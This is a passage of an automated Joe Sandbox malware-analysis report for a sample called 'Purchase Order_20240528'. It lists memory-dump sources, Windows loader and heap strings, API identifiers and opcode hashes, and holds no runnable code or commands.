                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-1334570610
                                  Strings
                                  • PreferredUILanguages, xrefs: 0169C212
                                  • @, xrefs: 0169C1F1
                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0169C1C5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                  • API String ID: 0-2968386058
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                  • API String ID: 0-1373925480
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-2558761708
                                  Strings
                                  • Process initialization failed with status 0x%08lx, xrefs: 016620F3
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01662104
                                  • LdrpInitializationFailure, xrefs: 016620FA
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2986994758
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: #%u
                                  • API String ID: 48624451-232158463
                                  Strings
                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0166895E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                  • API String ID: 0-702105204
                                  Strings
                                  • LdrResSearchResource Exit, xrefs: 015EAA25
                                  • LdrResSearchResource Enter, xrefs: 015EAA13
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                  • API String ID: 0-4066393604
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: `$`
                                  • API String ID: 0-197956300
                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                  • Instruction ID: a698c2c5862afa5a4a5d6c68120d0806c8aee6c4c55a1dfe6510da5f284cc184
                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                  • Instruction Fuzzy Hash: 7EC1BE312043429BE725CF68CC41B6BBBE6AFC4318F484A2EF6968B291D774D905CF55
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Legacy$UEFI
                                  • API String ID: 2994545307-634100481
                                  • Opcode ID: 6ff4604b60a1b9b26c718f1416920137afbb5519c000328c03058dc0b669530c
                                  • Instruction ID: fab33ac51e98d38f9c8150a5bc9c232732f845c3be453a0f92c2bf6239fbf219
                                  • Opcode Fuzzy Hash: 6ff4604b60a1b9b26c718f1416920137afbb5519c000328c03058dc0b669530c
                                  • Instruction Fuzzy Hash: 45616C72E006199FDF54DFA88D80BADFBB5FB48700F15406EEA49EB241D732AA00CB50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$MUI
                                  • API String ID: 0-17815947
                                  • Opcode ID: bf0ed8d15235f81f2f4f51612c9f9d980436b485a5375accca91b1209a5b7cf9
                                  • Instruction ID: 5d3890d03d3bf9ab7bfa470e6e4366a162db0a8575b38d4b5b8aec26540c485f
                                  • Opcode Fuzzy Hash: bf0ed8d15235f81f2f4f51612c9f9d980436b485a5375accca91b1209a5b7cf9
                                  • Instruction Fuzzy Hash: B051F771E4061EAEDF11DFA9CC90BEEBBB9FB58754F100629E611B7290DB309905CB60
                                  Strings
                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 015EA2FB
                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 015EA309
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                  • API String ID: 0-2876891731
                                  • Opcode ID: 4a3aa21c822c701ea33b33b2bd36c9b4003dcaf4de08a1c9eca4aeee17a67ebe
                                  • Instruction ID: 588feb8dce0be5d4cfe5c92a5275bf9e022bae34ccc90e30ce76bb6ee31257d4
                                  • Opcode Fuzzy Hash: 4a3aa21c822c701ea33b33b2bd36c9b4003dcaf4de08a1c9eca4aeee17a67ebe
                                  • Instruction Fuzzy Hash: 07419930A00646DBEB19CF69D894B6ABBF4BF88304F2444A9E914DF391E3B5D900CB50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Cleanup Group$Threadpool!
                                  • API String ID: 2994545307-4008356553
                                  • Opcode ID: 29068fbe04ff6f1c0c96588e75589d5719f72b1e609a3be41ce65f33098fde6c
                                  • Instruction ID: 28a8472b74ada99cd9dafe54866eed19cf896df9be8f522fead069b3a40b4dd5
                                  • Opcode Fuzzy Hash: 29068fbe04ff6f1c0c96588e75589d5719f72b1e609a3be41ce65f33098fde6c
                                  • Instruction Fuzzy Hash: A70121B2215780AFD311CF54CD45B1677E8E784725F08883DE608CB180E370E800CB8A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: MUI
                                  • API String ID: 0-1339004836
                                  • Opcode ID: 82d7dbb86b9363305b4e0baaba3a1bafefcee2af49c6e2ffd67228dbacf2d492
                                  • Instruction ID: ea8d2245197a0a4b8cb89f8cda163a957709eb4a2c61efeabba538fc318dbc9e
                                  • Opcode Fuzzy Hash: 82d7dbb86b9363305b4e0baaba3a1bafefcee2af49c6e2ffd67228dbacf2d492
                                  • Instruction Fuzzy Hash: 12826975E002198FEB29CFA9C988BEDBBF5BF48310F148169E919AF390D7709941CB50
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 837b4430c3e538ebe26902c3573c4df6517218bdae45b12b18c1360b7e3c36a3
                                  • Instruction ID: e026c2fc2e2c7d5dc1a3bea71a7f3f58011435476769fe6eb5832c7af19df7df
                                  • Opcode Fuzzy Hash: 837b4430c3e538ebe26902c3573c4df6517218bdae45b12b18c1360b7e3c36a3
                                  • Instruction Fuzzy Hash: EA22C1742046618BEB25EFADC850372BBF1AF44304F08865BDD868F386E775E492DB61
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a1cc927fdab34a1ce08c93c261e9ecb1ac4fc5c88004046acee0c495235b070
                                  • Instruction ID: 28eae9194aed1cef20b39661661fc30a0505afd59166cad6acac8faff8ab260a
                                  • Opcode Fuzzy Hash: 1a1cc927fdab34a1ce08c93c261e9ecb1ac4fc5c88004046acee0c495235b070
                                  • Instruction Fuzzy Hash: E4328C71E01215CFDB29CF68C884AAEBBF2FF58310F148569E956AB391D774E881CB50
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1e5bba8e54da128d24634b15718b41f6ef4d51e261ff8027fd6d56edbe0855ae
                                  • Instruction ID: 184456b348ba0b160812e0ab5eceab0431070bfcef96f18cc16644fc1a3e091c
                                  • Opcode Fuzzy Hash: 1e5bba8e54da128d24634b15718b41f6ef4d51e261ff8027fd6d56edbe0855ae
                                  • Instruction Fuzzy Hash: B6E1C071A08342CFC719CF28C494A6ABBE0FF99354F05896DE9958B351DB30E905CF92
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5153b0f7c99bd00b6239c7c38beeaa363064033a56430acb5350c61283cc9c97
                                  • Instruction ID: 94b184fa515e8f51d906e6971f1d4b4c07852b74500f798feaa8b4b110a7135d
                                  • Opcode Fuzzy Hash: 5153b0f7c99bd00b6239c7c38beeaa363064033a56430acb5350c61283cc9c97
                                  • Instruction Fuzzy Hash: B2A13331E006299FEB26DBACCC44BAFBBB5BB01714F0505A9EA00AB3D1C7749D41CB95
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c2db95a44b6f1be1f5690de5931ac3fa0c71ad4f57e3891095053471a9e849a7
                                  • Instruction ID: 5c420b16053c4e32ad4ed42d872bcef89e73f1c82405515896d7da58a8f30e75
                                  • Opcode Fuzzy Hash: c2db95a44b6f1be1f5690de5931ac3fa0c71ad4f57e3891095053471a9e849a7
                                  • Instruction Fuzzy Hash: 8E41A2B26043129FD729DF28CC84A17B7E5FF88214F004C6DE6A6C7791DB72E8458B51
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 286bdb29aee5c80c2c59e066001e08ec8778d2e2691b2982bfb6a4c6d02a0ba7
                                  • Instruction ID: 7ae727639561f4fd9241b682a401a3a02b7456b9609992844795722ed4a748b5
                                  • Opcode Fuzzy Hash: 286bdb29aee5c80c2c59e066001e08ec8778d2e2691b2982bfb6a4c6d02a0ba7
                                  • Instruction Fuzzy Hash: 70419AB1D417069FCB2AEF28C944A69B7FAFF94310F1586ADC4068B2A5DB30A941CF51
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 668a0d11121821793540168ab33754a540014f48f23b7e7fd534a5b73dae7251
                                  • Instruction ID: 86269400f068499b015a60bcd3fffef47a200cec53d6d4f87dff7cdbe7f79154
                                  • Opcode Fuzzy Hash: 668a0d11121821793540168ab33754a540014f48f23b7e7fd534a5b73dae7251
                                  • Instruction Fuzzy Hash: B8418E729043059FD760DF29CC45B9BBBE8FF88654F004A2EF598C7251DB709904CB92
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: df203eaabb5b0bc1158c32e0554055f96dfb7149f679a064fd3a2fc3913793be
                                  • Instruction ID: 531225c7131629a20414e3c931ab1c6bc525f9eb4c04d511efbef12925570eae
                                  • Opcode Fuzzy Hash: df203eaabb5b0bc1158c32e0554055f96dfb7149f679a064fd3a2fc3913793be
                                  • Instruction Fuzzy Hash: C541D170A043028BD729DF28D898B2ABBE9FFC0354F15486DE685DF291DB34D811CB91
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: d52802b8d8544c5cb93ccd261d1c43ca7702296760f555e9e6ee9ebe8043e9de
                                  • Instruction ID: a9fa44be257070481e241552bd86a23346fd06d4e12bf516f46e273f4ad8aedd
                                  • Opcode Fuzzy Hash: d52802b8d8544c5cb93ccd261d1c43ca7702296760f555e9e6ee9ebe8043e9de
                                  • Instruction Fuzzy Hash: E731ACB1A09302DFCB11EF19C94095ABBF1FF89214F054AAEE4999B351D332D945CB92
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 05e7b69143b95e64d3211887c424e311b49e9d7a331a33b46ad7b4e40224a6ba
                                  • Instruction ID: 4078bf7e3bf8c9883bc9cb089eda74094a8bdab309f81c3e135e4b40b90869ef
                                  • Opcode Fuzzy Hash: 05e7b69143b95e64d3211887c424e311b49e9d7a331a33b46ad7b4e40224a6ba
                                  • Instruction Fuzzy Hash: B111A0362006119BDB229A69DC80FA6BBA6FFC4751F154529EB83C7791DF30A842CB90
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 241eddff429c142e4297642fb8c135fd45c133f598acf9debef7cc963da45fcd
                                  • Instruction ID: cd7f7f8ccb3f9c18b8a5cce037dbd2c8ec34d1e539f142177c4adecdbe8173fb
                                  • Opcode Fuzzy Hash: 241eddff429c142e4297642fb8c135fd45c133f598acf9debef7cc963da45fcd
                                  • Instruction Fuzzy Hash: 81019736511259ABCF129F84DC40EDE7F6AFB4C764F068105FE1966220C732D971EB81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  • Opcode ID: c81a61c96b46af231eb3949a5e1ba489ffa365e84bc87adb7d995f8cfb8e098d
                                  • Instruction ID: 74193e67bd0a75c1f3bb65795b744327bd47bab3c6542fdf93d503cb6f69753c
                                  • Opcode Fuzzy Hash: c81a61c96b46af231eb3949a5e1ba489ffa365e84bc87adb7d995f8cfb8e098d
                                  • Instruction Fuzzy Hash: 14918371A0061AAFEB25DF95DC85FAEBBB9EF48750F100059F600AB290D774AD00CBA4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  • Opcode ID: b37fef2207ecf65e6a8bf88dd5df178d830876dddc23eb133c21543347899400
                                  • Instruction ID: 2a762aa1f0299d6bf19c1c64b289334228824b9d1481583099bbd7e18553bb20
                                  • Opcode Fuzzy Hash: b37fef2207ecf65e6a8bf88dd5df178d830876dddc23eb133c21543347899400
                                  • Instruction Fuzzy Hash: 0191A13190161ABFDB22AFA5DC54FAFBB7AFF85750F100129F601A7250DB769902CB50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: GlobalTags
                                  • API String ID: 0-1106856819
                                  • Opcode ID: d622fb05402c001f5565d46ccede13ef190a2324a3c2e069c1b161ebe5b47d70
                                  • Instruction ID: 9e43fd968f3b38f26805cb1c028017beb5a2eb1d83f0f34816599cfcf0873f68
                                  • Opcode Fuzzy Hash: d622fb05402c001f5565d46ccede13ef190a2324a3c2e069c1b161ebe5b47d70
                                  • Instruction Fuzzy Hash: 37716EB5E0021A9FDF68CF9CD9906ADBBB2BF48710F54816EE906A7341E7309941CB64
                                  Strings
                                  Memory Dump Source
